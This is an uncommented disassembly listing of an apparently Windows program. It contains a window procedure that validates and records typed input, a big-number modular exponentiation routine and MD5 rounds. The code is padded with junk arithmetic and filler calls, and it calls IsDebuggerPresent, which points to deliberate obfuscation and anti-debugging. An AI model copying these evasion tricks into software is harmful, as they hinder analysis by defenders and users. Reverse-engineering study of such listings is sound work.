var_144 = word ptr -144h
var_142 = byte ptr -142h
var_13D = byte ptr -13Dh
var_135 = word ptr -135h
var_133 = byte ptr -133h
var_132 = byte ptr -132h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = word ptr -120h
var_11E = word ptr -11Eh
var_11B = byte ptr -11Bh
var_11A = word ptr -11Ah
var_118 = word ptr -118h
var_115 = byte ptr -115h
var_114 = dword ptr -114h
var_10D = byte ptr -10Dh
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 27Ch
push ebx
push esi
push edi
call sub_40C538 ; RtlGetLastWin32Error
mov eax, [ebp+arg_4]
cmp eax, 10h
jz loc_40B36D
jg short loc_40B170
cmp eax, 2
jz loc_40B353
jmp loc_40B9CF
; ---------------------------------------------------------------------------
loc_40B170: ; CODE XREF: sub_40B143+1D�j
cmp eax, 111h
jz loc_40B47A
cmp eax, 113h
jz short loc_40B1B1
cmp eax, 111h
jl loc_40B9CF
cmp eax, 138h
jz loc_40B392
jmp loc_40B9CF
; ---------------------------------------------------------------------------
lea edi, [ebp+var_132]
lea esi, a9O1 ; " 9'O1"
mov ecx, 3
rep movsw
loc_40B1B1: ; CODE XREF: sub_40B143+3D�j
lea edi, [ebp+var_133]
lea esi, byte_445BEA
xor ecx, ecx
inc ecx
rep movsb
cmp dword_43B218, 0
jz loc_40B2FA
mov byte ptr [ebp+var_250+3], 0A1h
movzx eax, byte ptr [ebp+var_250+3]
imul eax, 1F49h
mov byte ptr [ebp+var_250+3], al
push 9
push offset aST ; ""
call sub_40129C
push eax
push dword_43B218
call sub_408DEF
mov [ebp+var_254], eax
push 8
push offset aS ; ""
call sub_40129C
push eax
push [ebp+var_254]
call sub_408DEF
add esp, 20h
mov [ebp+var_258], eax
call sub_40C514 ; GetCurrentThreadId
lea eax, [ebp+var_268]
push eax
push [ebp+var_258]
call sub_40C778 ; GetWindowRect
or eax, eax
jz loc_40B2FA
lea eax, [ebp+var_278]
push eax
push ds:dword_41EB84
call sub_40C778 ; GetWindowRect
or eax, eax
jz loc_40B2FA
mov byte ptr [ebp+var_250+2], 38h
add byte ptr [ebp+var_250+2], 25h
mov eax, [ebp+var_260]
sub eax, [ebp+var_268]
sub eax, 4
mov edx, [ebp+var_270]
sub edx, [ebp+var_278]
cmp eax, edx
jnz short loc_40B2AD
mov eax, [ebp+var_25C]
sub eax, [ebp+var_264]
sub eax, 4
mov edx, [ebp+var_26C]
sub edx, [ebp+var_274]
cmp eax, edx
jz short loc_40B2FA
loc_40B2AD: ; CODE XREF: sub_40B143+149�j
call sub_40C514 ; GetCurrentThreadId
push 1
mov eax, [ebp+var_25C]
sub eax, [ebp+var_264]
push eax
mov eax, [ebp+var_260]
sub eax, [ebp+var_268]
push eax
push 0
push 0
push ds:dword_41EB84
call sub_40C8A4 ; MoveWindow
mov [ebp+var_27A], 2EFFh
movzx eax, [ebp+var_27A]
imul eax, 4AB4h
mov [ebp+var_27A], ax
loc_40B2FA: ; CODE XREF: sub_40B143+86�j
; sub_40B143+FE�j ...
cmp dword_43B214, 0
jz loc_40BA03
lea edi, [ebp+var_254+1]
lea esi, aEv ; "ev# "
mov ecx, 5
rep movsb
mov eax, dword_43B214
mov dword_43B218, eax
call sub_40C598 ; GetTickCount
and dword_43B214, 0
push dword_43B218
call sub_408E89
pop ecx
mov word ptr [ebp+var_250+2], 4C5Ah
add word ptr [ebp+var_250+2], 7318h
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B353: ; CODE XREF: sub_40B143+22�j
mov eax, ds:dword_41B89C
cmp [ebp+arg_0], eax
jnz loc_40BA03
push 0
call sub_40C874 ; PostQuitMessage
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B36D: ; CODE XREF: sub_40B143+17�j
mov eax, ds:dword_41B89C
cmp [ebp+arg_0], eax
jnz short loc_40B37F
push [ebp+arg_0]
call sub_40C898 ; DestroyWindow
loc_40B37F: ; CODE XREF: sub_40B143+232�j
mov [ebp+var_10D], 7Dh
add [ebp+var_10D], 1
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B392: ; CODE XREF: sub_40B143+4F�j
mov eax, [ebp+arg_C]
mov [ebp+var_12C], eax
mov ax, word_445BF0
mov [ebp+var_135], ax
mov eax, [ebp+var_12C]
cmp eax, ds:dword_431CFC
jz short loc_40B3E2
cmp eax, ds:dword_413F70
jz short loc_40B3E2
cmp eax, ds:dword_41A864
jz short loc_40B3E2
cmp eax, ds:dword_433FE4
jz short loc_40B3E2
cmp eax, ds:dword_431D00
jz short loc_40B3E2
cmp eax, ds:dword_439328
jnz loc_40BA03
loc_40B3E2: ; CODE XREF: sub_40B143+271�j
; sub_40B143+279�j ...
call sub_40C5A4 ; GetVersion
mov eax, [ebp+var_12C]
cmp eax, ds:dword_431D00
jz short loc_40B3FD
cmp eax, ds:dword_439328
jnz short loc_40B40C
loc_40B3FD: ; CODE XREF: sub_40B143+2B0�j
push 1010B0h
push [ebp+arg_8]
call sub_40C8E0 ; SetTextColor
jmp short loc_40B416
; ---------------------------------------------------------------------------
loc_40B40C: ; CODE XREF: sub_40B143+2B8�j
push 0
push [ebp+arg_8]
call sub_40C8E0 ; SetTextColor
loc_40B416: ; CODE XREF: sub_40B143+2C7�j
push 0FFFFFFh
push [ebp+arg_8]
call sub_40C8D4 ; SetBkColor
call sub_40C5A4 ; GetVersion
and [ebp+var_260], 0
and [ebp+var_25C], 0
lea eax, [ebp+var_260]
push eax
call sub_40C8EC ; CreateBrushIndirect
mov [ebp+var_254], eax
mov word ptr [ebp+var_250+2], 72AAh
movzx eax, word ptr [ebp+var_250+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_250+2], ax
mov eax, [ebp+var_254]
jmp loc_40BA03
; ---------------------------------------------------------------------------
call sub_40C538 ; RtlGetLastWin32Error
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B47A: ; CODE XREF: sub_40B143+32�j
lea edi, [ebp+var_13D]
lea esi, aV880k ; "8+8 0k"
movsd
movsd
push 2
push offset aI ; ""
call sub_40129C
push offset byte_432F00
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 14h
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_431D04
call sub_40C76C ; GetWindowTextA
lea edi, [ebp+var_142]
lea esi, aA?5m ; "A?5m"
mov ecx, 5
rep movsb
cmp [ebp+var_FF], 0
jnz short loc_40B511
call sub_40C538 ; RtlGetLastWin32Error
push 1Fh
push offset word_445C82
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C7F0 ; MessageBoxA
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
call sub_40C508 ; GetCurrentProcessId
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B511: ; CODE XREF: sub_40B143+397�j
push 5
push offset aINi ; "ލ"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_248]
push edi
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 18h
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_41DA7C
call sub_40C76C ; GetWindowTextA
mov [ebp+var_114], 2AEEh
inc [ebp+var_114]
cmp [ebp+var_FF], 0
jnz short loc_40B5C8
call sub_40C508 ; GetCurrentProcessId
push 1Eh
push offset byte_445C5D
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40C7F0 ; MessageBoxA
mov word ptr [ebp+var_250+2], 5B80h
movzx eax, word ptr [ebp+var_250+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_250+2], ax
push ds:dword_41DA7C
call sub_40C7A8 ; SetFocus
mov [ebp+var_254], 12FAh
inc [ebp+var_254]
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B5C8: ; CODE XREF: sub_40B143+426�j
push 5
push offset aIAi ; "ހ"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_248]
push edi
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 18h
call sub_40C574 ; GetProcessHeap
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_41DA74
call sub_40C76C ; GetWindowTextA
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+var_FF], 0
jz loc_40B758
call sub_40C508 ; GetCurrentProcessId
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B62E: ; CODE XREF: sub_40B143+4F0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B62E
cmp eax, 4
jb loc_40B758
call sub_40C508 ; GetCurrentProcessId
mov [ebp+var_101], 0
jmp short loc_40B66E
; ---------------------------------------------------------------------------
loc_40B64C: ; CODE XREF: sub_40B143+544�j
movzx eax, [ebp+var_101]
mov al, [ebp+eax+var_FF]
cmp al, 30h
jl short loc_40B662
cmp al, 39h
jle short loc_40B667
loc_40B662: ; CODE XREF: sub_40B143+519�j
jmp loc_40B758
; ---------------------------------------------------------------------------
loc_40B667: ; CODE XREF: sub_40B143+51D�j
add [ebp+var_101], 1
loc_40B66E: ; CODE XREF: sub_40B143+507�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B677: ; CODE XREF: sub_40B143+539�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B677
movzx esi, [ebp+var_101]
cmp esi, eax
jb short loc_40B64C
mov [ebp+var_108], 6B03h
mov eax, [ebp+var_108]
mov edx, eax
add edx, eax
mov [ebp+var_108], edx
mov [ebp+var_100], 0
jmp loc_40B737
; ---------------------------------------------------------------------------
loc_40B6AF: ; CODE XREF: sub_40B143+60D�j
mov word ptr [ebp+var_250], 0DE0h
inc word ptr [ebp+var_250]
call sub_40C634 ; IsDebuggerPresent
mov al, [ebp+var_100]
mov byte ptr [ebp+var_250+3], al
jmp short loc_40B6FB
; ---------------------------------------------------------------------------
loc_40B6D2: ; CODE XREF: sub_40B143+5D1�j
movzx eax, byte ptr [ebp+var_250+3]
movsx eax, [ebp+eax+var_FF]
movzx edx, [ebp+var_100]
movsx edx, [ebp+edx+var_FF]
cmp eax, edx
jnz short loc_40B716
add byte ptr [ebp+var_250+3], 1
loc_40B6FB: ; CODE XREF: sub_40B143+58D�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B704: ; CODE XREF: sub_40B143+5C6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B704
movzx esi, byte ptr [ebp+var_250+3]
cmp esi, eax
jb short loc_40B6D2
loc_40B716: ; CODE XREF: sub_40B143+5AF�j
call sub_40C508 ; GetCurrentProcessId
movzx eax, byte ptr [ebp+var_250+3]
movzx edx, [ebp+var_100]
sub eax, edx
cmp eax, 3
jg short loc_40B758
add [ebp+var_100], 1
loc_40B737: ; CODE XREF: sub_40B143+567�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40B740: ; CODE XREF: sub_40B143+602�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B740
movzx esi, [ebp+var_100]
cmp esi, eax
jb loc_40B6AF
jmp short loc_40B7BC
; ---------------------------------------------------------------------------
loc_40B758: ; CODE XREF: sub_40B143+4D7�j
; sub_40B143+4F5�j ...
mov eax, dword_43B098
add eax, 7C4h
push eax
call sub_40C9B8
push 35h
push offset byte_445C21
call sub_40129C
mov [ebp+var_250], eax
push 13h
push offset byte_445C0D
call sub_40129C
add esp, 14h
push 0
push eax
mov edi, [ebp+var_250]
push edi
push 0
call sub_40C7F0 ; MessageBoxA
call sub_40C598 ; GetTickCount
push ds:dword_41DA74
call sub_40C7A8 ; SetFocus
mov ax, word_445BFF
mov [ebp+var_144], ax
jmp loc_40BA03
; ---------------------------------------------------------------------------
loc_40B7BC: ; CODE XREF: sub_40B143+613�j
push 5
push offset aINi ; "ލ"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_248]
push edi
push eax
lea edi, [ebp+var_248]
push edi
call sub_40CA30
add esp, 18h
mov [ebp+var_115], 1Ch
sub [ebp+var_115], 1Fh
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_41EA80
call sub_40C67C ; CreateFileA
mov [ebp+var_128], eax
push 2
push 0
push 0
push eax
call sub_40C6AC ; SetFilePointer
lea ecx, [ebp+var_248]
or eax, 0FFFFFFFFh
loc_40B828: ; CODE XREF: sub_40B143+6EA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B828
push 0
lea esi, [ebp+var_24C]
push esi
push eax
lea edi, [ebp+var_248]
push edi
push [ebp+var_128]
call sub_40C730 ; WriteFile
push 2
push offset aAz ; ""
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_24C]
push edi
mov edi, 0Eh
sub edi, dword_43B098
push edi
push eax
push [ebp+var_128]
call sub_40C730 ; WriteFile
mov [ebp+var_10C], 57C0h
mov eax, [ebp+var_10C]
mov edx, eax
add edx, eax
mov [ebp+var_10C], edx
push [ebp+var_128]
call sub_40C55C ; CloseHandle
mov [ebp+var_118], 2DFCh
sub [ebp+var_118], 4065h
push ds:dword_41EB84
call sub_40C898 ; DestroyWindow
lea edi, [ebp+var_149]
lea esi, aShzq ; "ShzQ"
mov ecx, 5
rep movsb
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40F280
call sub_40C67C ; CreateFileA
mov [ebp+var_128], eax
call sub_40C5A4 ; GetVersion
push 2
push 0
push 0
push [ebp+var_128]
call sub_40C6AC ; SetFilePointer
mov [ebp+var_11A], 34D4h
sub [ebp+var_11A], 5BB2h
lea ecx, byte_432F00
or eax, 0FFFFFFFFh
loc_40B920: ; CODE XREF: sub_40B143+7E2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40B920
mov edi, eax
push 0
lea esi, [ebp+var_24C]
push esi
push edi
push offset byte_432F00
push [ebp+var_128]
call sub_40C730 ; WriteFile
mov [ebp+var_11B], 99h
add [ebp+var_11B], 1
push 1
push offset aN_1 ; ""
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_24C]
push edi
mov edi, 3
sub edi, dword_43B094
push edi
push eax
push [ebp+var_128]
call sub_40C730 ; WriteFile
call sub_40C634 ; IsDebuggerPresent
push [ebp+var_128]
call sub_40C55C ; CloseHandle
mov [ebp+var_11E], 7327h
movzx eax, [ebp+var_11E]
imul eax, 3B23h
mov [ebp+var_11E], ax
push 5
push ds:dword_41C950
call sub_40C880 ; ShowWindow
mov [ebp+var_120], 519Ah
sub [ebp+var_120], 4248h
jmp short loc_40BA03
; ---------------------------------------------------------------------------
loc_40B9CF: ; CODE XREF: sub_40B143+28�j
; sub_40B143+44�j ...
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8B0 ; DefWindowProcA
jmp short loc_40BA03
; ---------------------------------------------------------------------------
mov [ebp+var_124], 2003h
mov eax, 20Bh
mul [ebp+var_124]
mov [ebp+var_254], eax
mov [ebp+var_124], eax
loc_40BA03: ; CODE XREF: sub_40B143+1BE�j
; sub_40B143+20B�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B143 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA0C proc near ; CODE XREF: sub_406E2B+1A�p
; sub_406E2B+35�p
jmp ds:dword_447340
sub_40BA0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA18 proc near ; CODE XREF: sub_4053A1+C4�p
jmp ds:dword_44734C
sub_40BA18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA24 proc near ; CODE XREF: sub_4053A1+131�p
jmp ds:dword_447350
sub_40BA24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA30 proc near ; CODE XREF: sub_4069E2+5F�p
jmp ds:dword_44735C
sub_40BA30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA3C proc near ; CODE XREF: sub_4069E2+35�p
jmp ds:dword_447360
sub_40BA3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA48 proc near ; CODE XREF: sub_4069E2+22�p
jmp ds:dword_447364
sub_40BA48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BA54 proc near ; CODE XREF: sub_406987+4C�p
jmp ds:dword_447368
sub_40BA54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA60 proc near ; CODE XREF: sub_4088A5+1D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_446C54
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_40BB2B
xor edx, edx
loc_40BA90: ; CODE XREF: sub_40BA60+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_40BAA2
mov edx, [ebp+arg_4]
call sub_40BABC
loc_40BAA2: ; CODE XREF: sub_40BA60+38�j
lea edx, dword_446C54
call sub_40BABC
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_40BA90
popa
pop ebp
retn 10h
sub_40BA60 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BABC proc near ; CODE XREF: sub_40BA60+3D�p
; sub_40BA60+48�p
lea edi, dword_446C14
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_446C54
call sub_40BB2B
loc_40BAD6: ; CODE XREF: sub_40BABC+5D�j
lea edi, dword_446C14
mov ecx, 10h
xor eax, eax
loc_40BAE3: ; CODE XREF: sub_40BABC+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_40BAE3
call sub_40BB3C
bt dword_446C54, ebx
jnb short loc_40BB18
mov esi, edx
lea edi, dword_446C14
xor eax, eax
mov ecx, 10h
loc_40BB07: ; CODE XREF: sub_40BABC+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BB07
call sub_40BB3C
loc_40BB18: ; CODE XREF: sub_40BABC+3A�j
dec ebx
jns short loc_40BAD6
mov edi, edx
lea esi, dword_446C14
mov ecx, 10h
rep movsd
retn
sub_40BABC endp
; =============== S U B R O U T I N E =======================================
sub_40BB2B proc near ; CODE XREF: sub_40BA60+29�p
; sub_40BABC+15�p
mov ebx, 1FFh
loc_40BB30: ; CODE XREF: sub_40BB2B+B�j
bt [edi], ebx
jb short locret_40BB38
dec ebx
jnz short loc_40BB30
locret_40BB38: ; CODE XREF: sub_40BB2B+8�j
retn
sub_40BB2B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40BB3C proc near ; CODE XREF: sub_40BABC+2E�p
; sub_40BABC+57�p
lea esi, dword_446C14
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_40BB4A: ; CODE XREF: sub_40BB3C+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_40BB73
ja short loc_40BB57
dec ecx
jns short loc_40BB4A
loc_40BB57: ; CODE XREF: sub_40BB3C+16�j
mov esi, [ebp+14h]
lea edi, dword_446C14
xor eax, eax
mov ecx, 10h
loc_40BB67: ; CODE XREF: sub_40BB3C+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BB67
locret_40BB73: ; CODE XREF: sub_40BB3C+14�j
retn
sub_40BB3C endp
; =============== S U B R O U T I N E =======================================
sub_40BB74 proc near ; CODE XREF: sub_40BBC5+32�p
; sub_40BBC5+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_40BB74 endp
; =============== S U B R O U T I N E =======================================
sub_40BB81 proc near ; CODE XREF: sub_40BBC5+219�p
; sub_40BBC5+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_40BB81 endp
; =============== S U B R O U T I N E =======================================
sub_40BB8E proc near ; CODE XREF: sub_40BBC5+420�p
; sub_40BBC5+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_40BB8E endp
; =============== S U B R O U T I N E =======================================
sub_40BB95 proc near ; CODE XREF: sub_40BBC5+627�p
; sub_40BBC5+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_40BB95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB9E proc near ; CODE XREF: sub_4088D5+94�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_40BB9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BBC5 proc near ; CODE XREF: sub_4088D5+B1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_446C94, eax
mov eax, [edi+4]
mov dword_446C98, eax
mov eax, [edi+8]
mov dword_446C9C, eax
mov eax, [edi+0Ch]
mov dword_446CA0, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB74
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB74
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB74
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB74
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB74
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB74
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB81
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB81
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BB81
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BB81
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BB8E
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BB8E
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
